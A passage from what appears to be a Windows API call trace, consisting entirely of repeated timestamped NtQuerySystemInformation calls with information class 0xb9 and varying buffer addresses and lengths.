SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccf0, Length=0x20, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.116] 